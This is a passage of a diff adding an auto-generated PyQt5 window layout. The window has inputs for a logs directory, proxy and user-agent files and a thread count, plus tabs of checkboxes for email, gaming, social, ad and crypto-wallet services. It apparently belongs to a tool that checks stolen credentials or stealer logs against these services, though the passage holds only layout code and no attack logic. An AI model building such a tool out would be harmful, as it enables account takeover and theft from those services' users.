are doing. + + +from PyQt5 import QtCore, QtGui, QtWidgets + + +class Ui_MainWindow(object): + def setupUi(self, MainWindow): + MainWindow.setObjectName("MainWindow") + MainWindow.resize(801, 820) + MainWindow.setMinimumSize(QtCore.QSize(801, 677)) + MainWindow.setMaximumSize(QtCore.QSize(801, 999)) + MainWindow.setSizeIncrement(QtCore.QSize(801, 677)) + MainWindow.setBaseSize(QtCore.QSize(801, 677)) + MainWindow.setStyleSheet("QLineEdit,\n" +"QComboBox,\n" +"QDateTimeEdit,\n" +"QSpinBox,\n" +"QDoubleSpinBox {\n" +" color: #1de9b6;\n" +" background-color: #31363b;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 4px;\n" +" height: 32px;\n" +"}\n" +"\n" +"QWidget {\n" +" background-color: #232629;\n" +" color: #ffffff;\n" +"}\n" +"\n" +"QGroupBox,\n" +"QFrame {\n" +" background-color: #232629;\n" +" border: 2px solid #4f5b62;\n" +" border-radius: 4px;\n" +"}\n" +"\n" +"QRadioButton::indicator,\n" +"QCheckBox::indicator {\n" +" width: 16px;\n" +" height: 16px;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 0;\n" +" transform: rotate(45deg);\n" +" transform-origin: center;\n" +"}\n" +"\n" +"QRadioButton::indicator:checked,\n" +"QCheckBox::indicator:checked {\n" +" background-color: #1de9b6;\n" +" border-color: #1de9b6;\n" +"}\n" +"\n" +"QRadioButton::indicator:hover,\n" +"QCheckBox::indicator:hover {\n" +" border-color: rgba(29, 233, 182, 0.8);\n" +"}\n" +"\n" +"QRadioButton::indicator:checked:hover,\n" +"QCheckBox::indicator:checked:hover {\n" +" border-color: #1de9b6;\n" +"}") + self.centralwidget = QtWidgets.QWidget(MainWindow) + self.centralwidget.setObjectName("centralwidget") + self.lineEdit_dir = QtWidgets.QLineEdit(self.centralwidget) + self.lineEdit_dir.setGeometry(QtCore.QRect(10, 280, 421, 31)) + font = QtGui.QFont() + font.setFamily("Furore") + font.setPointSize(10) + self.lineEdit_dir.setFont(font) + self.lineEdit_dir.setStyleSheet("QLineEdit,\n" +"QComboBox,\n" +"QDateTimeEdit,\n" +"QSpinBox,\n" +"QDoubleSpinBox {\n" +" color: #1de9b6;\n" +" background-color: #31363b;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 4px;\n" +" height: 32px;\n" +"}\n" +"\n" +"QWidget {\n" +" background-color: #232629;\n" +" color: #ffffff;\n" +"}\n" +"\n" +"QGroupBox,\n" +"QFrame {\n" +" background-color: #232629;\n" +" border: 2px solid #4f5b62;\n" +" border-radius: 4px;\n" +"}\n" +"\n" +"QRadioButton::indicator,\n" +"QCheckBox::indicator {\n" +" width: 16px;\n" +" height: 16px;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 0;\n" +" transform: rotate(45deg);\n" +" transform-origin: center;\n" +"}\n" +"\n" +"QRadioButton::indicator:checked,\n" +"QCheckBox::indicator:checked {\n" +" background-color: #1de9b6;\n" +" border-color: #1de9b6;\n" +"}\n" +"\n" +"QRadioButton::indicator:hover,\n" +"QCheckBox::indicator:hover {\n" +" border-color: rgba(29, 233, 182, 0.8);\n" +"}\n" +"\n" +"QRadioButton::indicator:checked:hover,\n" +"QCheckBox::indicator:checked:hover {\n" +" border-color: #1de9b6;\n" +"}") + self.lineEdit_dir.setObjectName("lineEdit_dir") + self.lineEdit_proxy = QtWidgets.QLineEdit(self.centralwidget) + self.lineEdit_proxy.setGeometry(QtCore.QRect(10, 320, 331, 31)) + font = QtGui.QFont() + font.setFamily("Furore") + font.setPointSize(10) + self.lineEdit_proxy.setFont(font) + self.lineEdit_proxy.setStyleSheet("QLineEdit,\n" +"QComboBox,\n" +"QDateTimeEdit,\n" +"QSpinBox,\n" +"QDoubleSpinBox {\n" +" color: #1de9b6;\n" +" background-color: #31363b;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 4px;\n" +" height: 32px;\n" +"}\n" +"\n" +"QWidget {\n" +" background-color: #232629;\n" +" color: #ffffff;\n" +"}\n" +"\n" +"QGroupBox,\n" +"QFrame {\n" +" background-color: #232629;\n" +" border: 2px solid #4f5b62;\n" +" border-radius: 4px;\n" +"}\n" +"\n" +"QRadioButton::indicator,\n" +"QCheckBox::indicator {\n" +" width: 16px;\n" +" height: 16px;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 0;\n" +" transform: rotate(45deg);\n" +" transform-origin: center;\n" +"}\n" +"\n" +"QRadioButton::indicator:checked,\n" +"QCheckBox::indicator:checked {\n" +" background-color: #1de9b6;\n" +" border-color: #1de9b6;\n" +"}\n" +"\n" +"QRadioButton::indicator:hover,\n" +"QCheckBox::indicator:hover {\n" +" border-color: rgba(29, 233, 182, 0.8);\n" +"}\n" +"\n" +"QRadioButton::indicator:checked:hover,\n" +"QCheckBox::indicator:checked:hover {\n" +" border-color: #1de9b6;\n" +"}") + self.lineEdit_proxy.setObjectName("lineEdit_proxy") + self.lineEdit_ua = QtWidgets.QLineEdit(self.centralwidget) + self.lineEdit_ua.setGeometry(QtCore.QRect(10, 360, 331, 31)) + font = QtGui.QFont() + font.setFamily("Furore") + font.setPointSize(10) + self.lineEdit_ua.setFont(font) + self.lineEdit_ua.setStyleSheet("QLineEdit,\n" +"QComboBox,\n" +"QDateTimeEdit,\n" +"QSpinBox,\n" +"QDoubleSpinBox {\n" +" color: #1de9b6;\n" +" background-color: #31363b;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 4px;\n" +" height: 32px;\n" +"}\n" +"\n" +"QWidget {\n" +" background-color: #232629;\n" +" color: #ffffff;\n" +"}\n" +"\n" +"QGroupBox,\n" +"QFrame {\n" +" background-color: #232629;\n" +" border: 2px solid #4f5b62;\n" +" border-radius: 4px;\n" +"}\n" +"\n" +"QRadioButton::indicator,\n" +"QCheckBox::indicator {\n" +" width: 16px;\n" +" height: 16px;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 0;\n" +" transform: rotate(45deg);\n" +" transform-origin: center;\n" +"}\n" +"\n" +"QRadioButton::indicator:checked,\n" +"QCheckBox::indicator:checked {\n" +" background-color: #1de9b6;\n" +" border-color: #1de9b6;\n" +"}\n" +"\n" +"QRadioButton::indicator:hover,\n" +"QCheckBox::indicator:hover {\n" +" border-color: rgba(29, 233, 182, 0.8);\n" +"}\n" +"\n" +"QRadioButton::indicator:checked:hover,\n" +"QCheckBox::indicator:checked:hover {\n" +" border-color: #1de9b6;\n" +"}") + self.lineEdit_ua.setObjectName("lineEdit_ua") + self.checkBox_ua = QtWidgets.QCheckBox(self.centralwidget) + self.checkBox_ua.setGeometry(QtCore.QRect(440, 360, 81, 31)) + font = QtGui.QFont() + font.setFamily("MS Shell Dlg 2") + font.setPointSize(9) + font.setBold(True) + self.checkBox_ua.setFont(font) + self.checkBox_ua.setStyleSheet("color: #c8c8c8") + self.checkBox_ua.setObjectName("checkBox_ua") + self.label_2 = QtWidgets.QLabel(self.centralwidget) + self.label_2.setGeometry(QtCore.QRect(10, 740, 601, 51)) + self.label_2.setStyleSheet("QLineEdit,\n" +"QComboBox,\n" +"QDateTimeEdit,\n" +"QSpinBox,\n" +"QDoubleSpinBox {\n" +" color: #1de9b6;\n" +" background-color: #31363b;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 4px;\n" +" height: 32px;\n" +"}\n" +"\n" +"QWidget {\n" +" background-color: #232629;\n" +" color: #ffffff;\n" +"}\n" +"\n" +"QGroupBox,\n" +"QFrame {\n" +" background-color: #232629;\n" +" border: 2px solid #4f5b62;\n" +" border-radius: 4px;\n" +"}\n" +"\n" +"QRadioButton::indicator,\n" +"QCheckBox::indicator {\n" +" width: 16px;\n" +" height: 16px;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 0;\n" +" transform: rotate(45deg);\n" +" transform-origin: center;\n" +"}\n" +"\n" +"QRadioButton::indicator:checked,\n" +"QCheckBox::indicator:checked {\n" +" background-color: #1de9b6;\n" +" border-color: #1de9b6;\n" +"}\n" +"\n" +"QRadioButton::indicator:hover,\n" +"QCheckBox::indicator:hover {\n" +" border-color: rgba(29, 233, 182, 0.8);\n" +"}\n" +"\n" +"QRadioButton::indicator:checked:hover,\n" +"QCheckBox::indicator:checked:hover {\n" +" border-color: #1de9b6;\n" +"}") + self.label_2.setText("") + self.label_2.setObjectName("label_2") + self.pushButton = QtWidgets.QPushButton(self.centralwidget) + self.pushButton.setGeometry(QtCore.QRect(620, 740, 171, 51)) + font = QtGui.QFont() + font.setFamily("Furore") + font.setPointSize(12) + self.pushButton.setFont(font) + self.pushButton.setStyleSheet("QLineEdit,\n" +"QComboBox,\n" +"QDateTimeEdit,\n" +"QSpinBox,\n" +"QDoubleSpinBox {\n" +" color: #1de9b6;\n" +" background-color: #31363b;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 4px;\n" +" height: 32px;\n" +"}\n" +"\n" +"QWidget {\n" +" background-color: #232629;\n" +" color: #ffffff;\n" +"}\n" +"\n" +"QGroupBox,\n" +"QFrame {\n" +" background-color: #232629;\n" +" border: 2px solid #4f5b62;\n" +" border-radius: 4px;\n" +"}\n" +"\n" +"QRadioButton::indicator,\n" +"QCheckBox::indicator {\n" +" width: 16px;\n" +" height: 16px;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 0;\n" +" transform: rotate(45deg);\n" +" transform-origin: center;\n" +"}\n" +"\n" +"QRadioButton::indicator:checked,\n" +"QCheckBox::indicator:checked {\n" +" background-color: #1de9b6;\n" +" border-color: #1de9b6;\n" +"}\n" +"\n" +"QRadioButton::indicator:hover,\n" +"QCheckBox::indicator:hover {\n" +" border-color: rgba(29, 233, 182, 0.8);\n" +"}\n" +"\n" +"QRadioButton::indicator:checked:hover,\n" +"QCheckBox::indicator:checked:hover {\n" +" border-color: #1de9b6;\n" +"}") + self.pushButton.setObjectName("pushButton") + self.progressBar = QtWidgets.QProgressBar(self.centralwidget) + self.progressBar.setGeometry(QtCore.QRect(180, 750, 421, 31)) + self.progressBar.setStyleSheet("background-color: #181818;\n" +"border: 3px solid #363636;\n" +"color: #c8c8c8") + self.progressBar.setProperty("value", 24) + self.progressBar.setTextVisible(False) + self.progressBar.setOrientation(QtCore.Qt.Horizontal) + self.progressBar.setInvertedAppearance(False) + self.progressBar.setObjectName("progressBar") + self.pushButton_dir_logs = QtWidgets.QPushButton(self.centralwidget) + self.pushButton_dir_logs.setGeometry(QtCore.QRect(430, 280, 91, 31)) + self.pushButton_dir_logs.setStyleSheet("") + self.pushButton_dir_logs.setObjectName("pushButton_dir_logs") + self.pushButton_proxies_files = QtWidgets.QPushButton(self.centralwidget) + self.pushButton_proxies_files.setGeometry(QtCore.QRect(340, 320, 91, 31)) + self.pushButton_proxies_files.setStyleSheet("") + self.pushButton_proxies_files.setObjectName("pushButton_proxies_files") + self.pushButton_useragents_file = QtWidgets.QPushButton(self.centralwidget) + self.pushButton_useragents_file.setGeometry(QtCore.QRect(340, 360, 91, 31)) + self.pushButton_useragents_file.setStyleSheet("") + self.pushButton_useragents_file.setObjectName("pushButton_useragents_file") + self.textEdit_console = QtWidgets.QTextEdit(self.centralwidget) + self.textEdit_console.setGeometry(QtCore.QRect(10, 20, 781, 251)) + self.textEdit_console.setStyleSheet("background-color: #181818;\n" +"border: 3px solid #363636;\n" +"color: #c8c8c8") + self.textEdit_console.setObjectName("textEdit_console") + self.social_network_label = QtWidgets.QLabel(self.centralwidget) + self.social_network_label.setGeometry(QtCore.QRect(10, 740, 161, 51)) + font = QtGui.QFont() + font.setFamily("Furore") + font.setPointSize(10) + self.social_network_label.setFont(font) + self.social_network_label.setStyleSheet("") + self.social_network_label.setObjectName("social_network_label") + self.spinBox_thr = QtWidgets.QSpinBox(self.centralwidget) + self.spinBox_thr.setGeometry(QtCore.QRect(90, 750, 71, 31)) + font = QtGui.QFont() + font.setFamily("Impact") + font.setPointSize(10) + self.spinBox_thr.setFont(font) + self.spinBox_thr.setStyleSheet("QLineEdit,\n" +"QComboBox,\n" +"QDateTimeEdit,\n" +"QSpinBox,\n" +"QDoubleSpinBox {\n" +" color: #1de9b6;\n" +" background-color: #31363b;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 4px;\n" +" height: 32px;\n" +"}\n" +"\n" +"QWidget {\n" +" background-color: #232629;\n" +" color: #ffffff;\n" +"}\n" +"\n" +"QGroupBox,\n" +"QFrame {\n" +" background-color: #232629;\n" +" border: 2px solid #4f5b62;\n" +" border-radius: 4px;\n" +"}\n" +"\n" +"QRadioButton::indicator,\n" +"QCheckBox::indicator {\n" +" width: 16px;\n" +" height: 16px;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 0;\n" +" transform: rotate(45deg);\n" +" transform-origin: center;\n" +"}\n" +"\n" +"QRadioButton::indicator:checked,\n" +"QCheckBox::indicator:checked {\n" +" background-color: #1de9b6;\n" +" border-color: #1de9b6;\n" +"}\n" +"\n" +"QRadioButton::indicator:hover,\n" +"QCheckBox::indicator:hover {\n" +" border-color: rgba(29, 233, 182, 0.8);\n" +"}\n" +"\n" +"QRadioButton::indicator:checked:hover,\n" +"QCheckBox::indicator:checked:hover {\n" +" border-color: #1de9b6;\n" +"}") + self.spinBox_thr.setObjectName("spinBox_thr") + self.label_lgbt = QtWidgets.QLabel(self.centralwidget) + self.label_lgbt.setGeometry(QtCore.QRect(0, 0, 801, 5)) + self.label_lgbt.setText("") + self.label_lgbt.setScaledContents(True) + self.label_lgbt.setObjectName("label_lgbt") + self.comboBox_proxy = QtWidgets.QComboBox(self.centralwidget) + self.comboBox_proxy.setGeometry(QtCore.QRect(440, 320, 71, 21)) + font = QtGui.QFont() + font.setFamily("MS Sans Serif") + font.setPointSize(10) + self.comboBox_proxy.setFont(font) + self.comboBox_proxy.setStyleSheet("") + self.comboBox_proxy.setObjectName("comboBox_proxy") + self.comboBox_proxy.addItem("") + self.comboBox_proxy.addItem("") + self.comboBox_proxy.addItem("") + self.comboBox_proxy.addItem("") + self.stats_box = QtWidgets.QLabel(self.centralwidget) + self.stats_box.setGeometry(QtCore.QRect(530, 280, 261, 131)) + font = QtGui.QFont() + font.setFamily("Impact") + font.setPointSize(12) + self.stats_box.setFont(font) + self.stats_box.setStyleSheet("") + self.stats_box.setText("") + self.stats_box.setObjectName("stats_box") + self.inbox_tab_widget = QtWidgets.QTabWidget(self.centralwidget) + self.inbox_tab_widget.setGeometry(QtCore.QRect(10, 430, 781, 281)) + font = QtGui.QFont() + font.setFamily("Furore") + self.inbox_tab_widget.setFont(font) + self.inbox_tab_widget.setFocusPolicy(QtCore.Qt.TabFocus) + self.inbox_tab_widget.setContextMenuPolicy(QtCore.Qt.DefaultContextMenu) + self.inbox_tab_widget.setAutoFillBackground(False) + self.inbox_tab_widget.setStyleSheet("QTabWidget::pane { /* The tab widget frame */\n" +" border-top: 2px solid #000000;\n" +" position: absolute;\n" +" top: -0.5em;\n" +"}\n" +"\n" +"QTabWidget::tab-bar {\n" +" alignment: center;\n" +"}\n" +"\n" +"/* Style the tab using the tab sub-control. Note that\n" +" it reads QTabBar _not_ QTabWidget */\n" +"QTabBar::tab {\n" +" background: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1,\n" +" stop: 0 #000000, stop: 0.4 #000000,\n" +" stop: 0.5 #000000, stop: 1.0 #000000);\n" +" border: 2px solid ;\n" +" selection-color: rgb(15, 255, 167);\n" +" border-bottom-color: #000000; /* same as the pane color */\n" +" border-top-left-radius: 12px;\n" +" border-top-right-radius: 12px;\n" +" min-width: 8ex;\n" +" padding: 8px;\n" +"}\n" +"\n" +"QTabBar::tab:selected, QTabBar::tab:hover {\n" +" background: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1,\n" +" stop: 0 #000000, stop: 0.4 #000000,\n" +" stop: 0.5 #000000, stop: 1.0 #000000);\n" +"}\n" +"\n" +"QTabBar::tab:selected {\n" +" border-color: #00def2;\n" +" border-bottom-color: #00def2; /* same as pane color */\n" +"}") + self.inbox_tab_widget.setTabPosition(QtWidgets.QTabWidget.North) + self.inbox_tab_widget.setTabShape(QtWidgets.QTabWidget.Rounded) + self.inbox_tab_widget.setElideMode(QtCore.Qt.ElideNone) + self.inbox_tab_widget.setMovable(False) + self.inbox_tab_widget.setTabBarAutoHide(False) + self.inbox_tab_widget.setObjectName("inbox_tab_widget") + self.inbox_tab = QtWidgets.QWidget() + self.inbox_tab.setObjectName("inbox_tab") + self.widget = QtWidgets.QWidget(self.inbox_tab) + self.widget.setGeometry(QtCore.QRect(9, 10, 761, 221)) + self.widget.setObjectName("widget") + self.inbox_checkbox_gridlayout = QtWidgets.QGridLayout(self.widget) + self.inbox_checkbox_gridlayout.setContentsMargins(0, 0, 0, 0) + self.inbox_checkbox_gridlayout.setObjectName("inbox_checkbox_gridlayout") + self.gmail_inbox_checkbox = QtWidgets.QCheckBox(self.widget) + self.gmail_inbox_checkbox.setEnabled(False) + self.gmail_inbox_checkbox.setObjectName("gmail_inbox_checkbox") + self.inbox_checkbox_gridlayout.addWidget(self.gmail_inbox_checkbox, 0, 0, 1, 1) + self.yandex_checkbox = QtWidgets.QCheckBox(self.widget) + self.yandex_checkbox.setEnabled(False) + self.yandex_checkbox.setObjectName("yandex_checkbox") + self.inbox_checkbox_gridlayout.addWidget(self.yandex_checkbox, 0, 1, 1, 1) + self.yahoo_checkbox = QtWidgets.QCheckBox(self.widget) + self.yahoo_checkbox.setEnabled(False) + self.yahoo_checkbox.setObjectName("yahoo_checkbox") + self.inbox_checkbox_gridlayout.addWidget(self.yahoo_checkbox, 1, 0, 1, 1) + self.outlook_checkbox = QtWidgets.QCheckBox(self.widget) + self.outlook_checkbox.setEnabled(False) + self.outlook_checkbox.setObjectName("outlook_checkbox") + self.inbox_checkbox_gridlayout.addWidget(self.outlook_checkbox, 1, 1, 1, 1) + self.webmail_checkbox = QtWidgets.QCheckBox(self.widget) + self.webmail_checkbox.setEnabled(False) + self.webmail_checkbox.setObjectName("webmail_checkbox") + self.inbox_checkbox_gridlayout.addWidget(self.webmail_checkbox, 2, 0, 1, 1) + self.mailru_checkbox = QtWidgets.QCheckBox(self.widget) + self.mailru_checkbox.setEnabled(False) + self.mailru_checkbox.setObjectName("mailru_checkbox") + self.inbox_checkbox_gridlayout.addWidget(self.mailru_checkbox, 2, 1, 1, 1) + self.cpanel_checkbox = QtWidgets.QCheckBox(self.widget) + self.cpanel_checkbox.setEnabled(False) + self.cpanel_checkbox.setObjectName("cpanel_checkbox") + self.inbox_checkbox_gridlayout.addWidget(self.cpanel_checkbox, 3, 0, 1, 1) + self.office_checkbox = QtWidgets.QCheckBox(self.widget) + self.office_checkbox.setEnabled(False) + self.office_checkbox.setObjectName("office_checkbox") + self.inbox_checkbox_gridlayout.addWidget(self.office_checkbox, 3, 1, 1, 1) + self.inbox_tab_widget.addTab(self.inbox_tab, "") + self.ads_tab = QtWidgets.QWidget() + self.ads_tab.setObjectName("ads_tab") + self.widget1 = QtWidgets.QWidget(self.ads_tab) + self.widget1.setGeometry(QtCore.QRect(10, 10, 761, 211)) + self.widget1.setObjectName("widget1") + self.gridLayout_3 = QtWidgets.QGridLayout(self.widget1) + self.gridLayout_3.setContentsMargins(0, 0, 0, 0) + self.gridLayout_3.setObjectName("gridLayout_3") + self.bing_ads_checkbox = QtWidgets.QCheckBox(self.widget1) + self.bing_ads_checkbox.setEnabled(False) + self.bing_ads_checkbox.setObjectName("bing_ads_checkbox") + self.gridLayout_3.addWidget(self.bing_ads_checkbox, 0, 0, 1, 1) + self.reddit_ads__checkbox = QtWidgets.QCheckBox(self.widget1) + self.reddit_ads__checkbox.setEnabled(False) + self.reddit_ads__checkbox.setObjectName("reddit_ads__checkbox") + self.gridLayout_3.addWidget(self.reddit_ads__checkbox, 0, 1, 1, 1) + self.ahref_checkbox = QtWidgets.QCheckBox(self.widget1) + self.ahref_checkbox.setEnabled(False) + self.ahref_checkbox.setObjectName("ahref_checkbox") + self.gridLayout_3.addWidget(self.ahref_checkbox, 0, 2, 1, 1) + self.snapchat_ads_checkbox = QtWidgets.QCheckBox(self.widget1) + self.snapchat_ads_checkbox.setEnabled(False) + self.snapchat_ads_checkbox.setObjectName("snapchat_ads_checkbox") + self.gridLayout_3.addWidget(self.snapchat_ads_checkbox, 1, 0, 1, 1) + self.tinder_ads_checkbox = QtWidgets.QCheckBox(self.widget1) + self.tinder_ads_checkbox.setEnabled(False) + self.tinder_ads_checkbox.setObjectName("tinder_ads_checkbox") + self.gridLayout_3.addWidget(self.tinder_ads_checkbox, 1, 1, 1, 1) + self.twitter_ads_checkbox = QtWidgets.QCheckBox(self.widget1) + self.twitter_ads_checkbox.setEnabled(False) + self.twitter_ads_checkbox.setObjectName("twitter_ads_checkbox") + self.gridLayout_3.addWidget(self.twitter_ads_checkbox, 1, 2, 1, 1) + self.sem_rush_checkbox = QtWidgets.QCheckBox(self.widget1) + self.sem_rush_checkbox.setEnabled(False) + self.sem_rush_checkbox.setObjectName("sem_rush_checkbox") + self.gridLayout_3.addWidget(self.sem_rush_checkbox, 2, 0, 1, 1) + self.craigslist_ads_checkbox = QtWidgets.QCheckBox(self.widget1) + self.craigslist_ads_checkbox.setEnabled(False) + self.craigslist_ads_checkbox.setObjectName("craigslist_ads_checkbox") + self.gridLayout_3.addWidget(self.craigslist_ads_checkbox, 3, 0, 1, 1) + self.facebookads__checkbox = QtWidgets.QCheckBox(self.widget1) + self.facebookads__checkbox.setObjectName("facebookads__checkbox") + self.gridLayout_3.addWidget(self.facebookads__checkbox, 3, 1, 1, 1) + self.microsoft_ads_checkbox = QtWidgets.QCheckBox(self.widget1) + self.microsoft_ads_checkbox.setEnabled(False) + self.microsoft_ads_checkbox.setObjectName("microsoft_ads_checkbox") + self.gridLayout_3.addWidget(self.microsoft_ads_checkbox, 2, 2, 1, 1) + self.inbox_tab_widget.addTab(self.ads_tab, "") + self.game_tab = QtWidgets.QWidget() + self.game_tab.setObjectName("game_tab") + self.widget2 = QtWidgets.QWidget(self.game_tab) + self.widget2.setGeometry(QtCore.QRect(10, 10, 761, 201)) + self.widget2.setObjectName("widget2") + self.game_checkbox_gridlayout = QtWidgets.QGridLayout(self.widget2) + self.game_checkbox_gridlayout.setContentsMargins(0, 0, 0, 0) + self.game_checkbox_gridlayout.setObjectName("game_checkbox_gridlayout") + self.checkBox_steam = QtWidgets.QCheckBox(self.widget2) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_steam.setFont(font) + self.checkBox_steam.setStyleSheet("") + self.checkBox_steam.setObjectName("checkBox_steam") + self.game_checkbox_gridlayout.addWidget(self.checkBox_steam, 0, 0, 1, 1) + self.checkBox_pathofexile = QtWidgets.QCheckBox(self.widget2) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_pathofexile.setFont(font) + self.checkBox_pathofexile.setStyleSheet("") + self.checkBox_pathofexile.setObjectName("checkBox_pathofexile") + self.game_checkbox_gridlayout.addWidget(self.checkBox_pathofexile, 0, 1, 1, 1) + self.checkBox_roblox = QtWidgets.QCheckBox(self.widget2) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_roblox.setFont(font) + self.checkBox_roblox.setStyleSheet("") + self.checkBox_roblox.setObjectName("checkBox_roblox") + self.game_checkbox_gridlayout.addWidget(self.checkBox_roblox, 1, 0, 1, 1) + self.checkBox_battlenet = QtWidgets.QCheckBox(self.widget2) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_battlenet.setFont(font) + self.checkBox_battlenet.setStyleSheet("") + self.checkBox_battlenet.setObjectName("checkBox_battlenet") + self.game_checkbox_gridlayout.addWidget(self.checkBox_battlenet, 2, 0, 1, 1) + self.inbox_tab_widget.addTab(self.game_tab, "") + self.social_network_tab = QtWidgets.QWidget() + self.social_network_tab.setObjectName("social_network_tab") + self.layoutWidget = QtWidgets.QWidget(self.social_network_tab) + self.layoutWidget.setGeometry(QtCore.QRect(10, 10, 761, 231)) + self.layoutWidget.setObjectName("layoutWidget") + self.gridLayout = QtWidgets.QGridLayout(self.layoutWidget) + self.gridLayout.setContentsMargins(0, 0, 0, 0) + self.gridLayout.setObjectName("gridLayout") + self.checkBox_instagram = QtWidgets.QCheckBox(self.layoutWidget) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_instagram.setFont(font) + self.checkBox_instagram.setStyleSheet("") + self.checkBox_instagram.setObjectName("checkBox_instagram") + self.gridLayout.addWidget(self.checkBox_instagram, 0, 0, 1, 1) + self.myspace_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.myspace_checkbox.setEnabled(False) + font = QtGui.QFont() + font.setFamily("Arial") + self.myspace_checkbox.setFont(font) + self.myspace_checkbox.setObjectName("myspace_checkbox") + self.gridLayout.addWidget(self.myspace_checkbox, 2, 2, 1, 1) + self.reddit_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.reddit_checkbox.setEnabled(False) + self.reddit_checkbox.setObjectName("reddit_checkbox") + self.gridLayout.addWidget(self.reddit_checkbox, 1, 2, 1, 1) + self.checkBox_discord = QtWidgets.QCheckBox(self.layoutWidget) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_discord.setFont(font) + self.checkBox_discord.setStyleSheet("") + self.checkBox_discord.setObjectName("checkBox_discord") + self.gridLayout.addWidget(self.checkBox_discord, 2, 1, 1, 1) + self.kick_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.kick_checkbox.setObjectName("kick_checkbox") + self.gridLayout.addWidget(self.kick_checkbox, 5, 0, 1, 1) + self.checkBox_facebook_ads = QtWidgets.QCheckBox(self.layoutWidget) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_facebook_ads.setFont(font) + self.checkBox_facebook_ads.setStyleSheet("") + self.checkBox_facebook_ads.setObjectName("checkBox_facebook_ads") + self.gridLayout.addWidget(self.checkBox_facebook_ads, 0, 2, 1, 1) + self.checkBox_tiktok = QtWidgets.QCheckBox(self.layoutWidget) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_tiktok.setFont(font) + self.checkBox_tiktok.setStyleSheet("") + self.checkBox_tiktok.setObjectName("checkBox_tiktok") + self.gridLayout.addWidget(self.checkBox_tiktok, 2, 0, 1, 1) + self.pintrest_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.pintrest_checkbox.setEnabled(False) + self.pintrest_checkbox.setObjectName("pintrest_checkbox") + self.gridLayout.addWidget(self.pintrest_checkbox, 1, 0, 1, 1) + self.checkBox_youtube = QtWidgets.QCheckBox(self.layoutWidget) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_youtube.setFont(font) + self.checkBox_youtube.setStyleSheet("") + self.checkBox_youtube.setObjectName("checkBox_youtube") + self.gridLayout.addWidget(self.checkBox_youtube, 0, 1, 1, 1) + self.vimeo_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.vimeo_checkbox.setObjectName("vimeo_checkbox") + self.gridLayout.addWidget(self.vimeo_checkbox, 5, 1, 1, 1) + self.rumble_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.rumble_checkbox.setEnabled(False) + self.rumble_checkbox.setObjectName("rumble_checkbox") + self.gridLayout.addWidget(self.rumble_checkbox, 5, 2, 1, 1) + self.localsapp_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.localsapp_checkbox.setEnabled(False) + self.localsapp_checkbox.setObjectName("localsapp_checkbox") + self.gridLayout.addWidget(self.localsapp_checkbox, 5, 3, 1, 1) + self.snapchat_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.snapchat_checkbox.setEnabled(False) + self.snapchat_checkbox.setObjectName("snapchat_checkbox") + self.gridLayout.addWidget(self.snapchat_checkbox, 1, 3, 1, 1) + self.patreon_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.patreon_checkbox.setEnabled(False) + self.patreon_checkbox.setObjectName("patreon_checkbox") + self.gridLayout.addWidget(self.patreon_checkbox, 5, 4, 1, 1) + self.checkBox_netflix = QtWidgets.QCheckBox(self.layoutWidget) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_netflix.setFont(font) + self.checkBox_netflix.setStyleSheet("") + self.checkBox_netflix.setObjectName("checkBox_netflix") + self.gridLayout.addWidget(self.checkBox_netflix, 1, 1, 1, 1) + self.checkBox_vk = QtWidgets.QCheckBox(self.layoutWidget) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_vk.setFont(font) + self.checkBox_vk.setStyleSheet("") + self.checkBox_vk.setObjectName("checkBox_vk") + self.gridLayout.addWidget(self.checkBox_vk, 1, 4, 1, 1) + self.twitch_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.twitch_checkbox.setEnabled(False) + self.twitch_checkbox.setObjectName("twitch_checkbox") + self.gridLayout.addWidget(self.twitch_checkbox, 0, 3, 1, 1) + self.linkedin_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.linkedin_checkbox.setEnabled(False) + self.linkedin_checkbox.setObjectName("linkedin_checkbox") + self.gridLayout.addWidget(self.linkedin_checkbox, 2, 3, 1, 1) + self.inbox_tab_widget.addTab(self.social_network_tab, "") + self.crypto_wallets_tab = QtWidgets.QWidget() + self.crypto_wallets_tab.setObjectName("crypto_wallets_tab") + self.widget3 = QtWidgets.QWidget(self.crypto_wallets_tab) + self.widget3.setGeometry(QtCore.QRect(10, 10, 761, 221)) + self.widget3.setObjectName("widget3") + self.gridLayout_6 = QtWidgets.QGridLayout(self.widget3) + self.gridLayout_6.setContentsMargins(0, 0, 0, 0) + self.gridLayout_6.setObjectName("gridLayout_6") + self.checkBox_coinbase = QtWidgets.QCheckBox(self.widget3) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_coinbase.setFont(font) + self.checkBox_coinbase.setStyleSheet("") + 